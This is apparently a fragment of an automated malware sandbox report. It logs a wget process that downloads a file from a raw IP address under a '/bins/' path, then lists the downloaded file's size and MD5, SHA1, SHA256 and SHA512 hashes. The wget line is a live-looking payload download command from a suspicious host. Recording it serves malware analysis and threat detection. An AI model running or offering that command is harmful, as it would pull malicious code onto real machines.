/usr/bin/wgetwget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:876
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97